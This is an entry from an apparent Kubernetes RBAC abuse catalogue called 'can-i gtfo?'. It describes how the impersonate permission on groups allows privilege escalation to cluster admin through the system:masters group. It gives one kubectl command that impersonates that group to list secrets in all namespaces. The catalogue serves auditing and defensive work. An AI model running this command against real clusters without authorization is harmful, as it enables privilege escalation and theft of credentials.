can-i gtfo?

Kubernetes RBAC Abuse Collection

View on GitHub

impersonate groups

Verb: impersonate

Resource: groups

Description: Impersonate privileged groups like system:masters

Abuses

Privilege Escalation

Impersonate system:masters or other privileged groups to gain cluster admin access

# Impersonate system:masters group
kubectl --as-group=system:masters get secrets --all-namespaces
← Back to overview